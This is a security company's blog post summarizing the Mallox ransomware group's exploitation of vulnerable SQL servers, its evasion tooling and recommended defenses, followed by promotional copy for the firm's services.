Chris Swagler | August 23rd, 2023

Mallox Ransomware

The notorious Mallox ransomware group has intensified its targeted attacks against organizations with vulnerable SQL servers. The group, known by aliases such as TargetCompany, Fargo, and Tohnichi, has recently unleashed a new variant and incorporated additional malware tools to bolster its persistence and bypass detection, fueling its rapid ascent in the cyber threat landscape. Researchers have shed light on the group’s evolving tactics, urging organizations to fortify their defenses to thwart potential attacks.

Consistency in Initial Attack Vector

While the Mallox ransomware group’s modus operandi in gaining access to targeted networks remains consistent, the group has been progressively refining its techniques. As uncovered by one cybersecurity company, the threat operators exploit vulnerable SQL servers to establish a persistent foothold within the target’s network, leveraging two well-known remote code execution (RCE) vulnerabilities, namely CVE-2020-0618 and CVE-2019-1068, during the initial stages of their assaults. The group has already boasted about infecting numerous organizations worldwide, spanning various sectors such as manufacturing, retail, wholesale, legal, and professional services.

A Shift in Stealth and Evasion Strategies

While the group’s initial attack vector persists, Mallox has proactively adapted its evasion tactics as the attack progresses. The threat operators have begun employing a diversified approach to maintain a concealed presence within compromised networks and obfuscate their malicious activities. Researchers have noted that the group uses a “trial and error” methodology to ensure persistence, modifying URLs and applicable paths until successfully executing the Remcos Remote Access Trojan (RAT).

Undetectable Malware Tactics

To remain undetected by security solutions, the Mallox ransomware group has adopted Fully Undetectable (FUD) techniques, effectively camouflaging their ransomware and bolstering their chances of success. The use of FUD packers, which automatically scramble the ransomware to evade signature-based detection, is reminiscent of techniques employed by the BatCloak obfuscator. Additionally, the group has incorporated Metasploit’s hacking tool in the later stages of their attacks to load the Mallox ransomware wrapped in the FUD packer. While using FUD packers and Metasploit is not novel, it underscores the group’s determination to innovate and circumvent existing security measures.

Defending Against Mallox Ransomware

Experts emphasize that most victims of Mallox still have vulnerable SQL servers susceptible to exploitation. To bolster defenses against this growing menace, security teams must conduct thorough vulnerability assessments, patch gaps, and secure all potential attack surfaces.

Recognizing that traditional security solutions may fall short against FUD packers, the researchers recommend adopting AI- and machine learning-based file-checking and behavior-monitoring solutions. Such technologies can proactively identify and neutralize sophisticated threats.

A multi-layered defense approach is crucial in mitigating the impact of ransomware attacks. Network blocking, ransomware detection, and blocking measures should be implemented to fortify security defenses. Moreover, organizations must educate their staff on potential intrusion attempts and malicious activities to raise awareness and prevent unauthorized access.

The Mallox ransomware group’s latest campaign signifies a considerable escalation in targeted attacks against organizations globally. With their revamped malware variants and enhanced evasion tactics, the group poses a severe threat to vulnerable SQL servers and the businesses that rely on them. Organizations must remain vigilant, implement robust security measures, and leverage cutting-edge technologies to defend against the evolving threats posed by the Mallox ransomware group and others.

At SpearTip, we analyze the configurations and interactions of your network infrastructure with the expertise of a skilled penetration tester. SpearTip discovers vulnerabilities in firewall systems and enables you to dedicate your resources to evaluate and prioritize fixes. This will provide visibility of actual network gaps, including existing false negatives. SpearTip provides clear remediation steps to ensure a strengthened security posture for all uncovered weaknesses. SpearTip offers two types of tabletop exercises: Executive and Technical. Executive tabletop exercises are custom designed to enhance the collaboration among business leaders and promote a common understanding of how leadership teams respond to an incident.

If your company is experiencing a breach, call our Security Operations Centers at 833.997.7327 to speak directly with an engineer.

Stay Connected With SpearTip

Inside the SOC Newsletter

View our articles that cover trending topics in cybersecurity with insights from our 24/7/365 Security Operations Center.

ShadowSpear Platform

Cybersecurity actors are working around the clock, shouldn’t your security team be too? Technology solutions and security controls fail for a number of reasons, poor deployment, improper implementation, or just no one monitoring the alerts.

ShadowSpear Demo

Experience ShadowSpear for yourself. Our lightweight, integrated solution will help you sleep easier at night and provide immediate confidence in your security posture.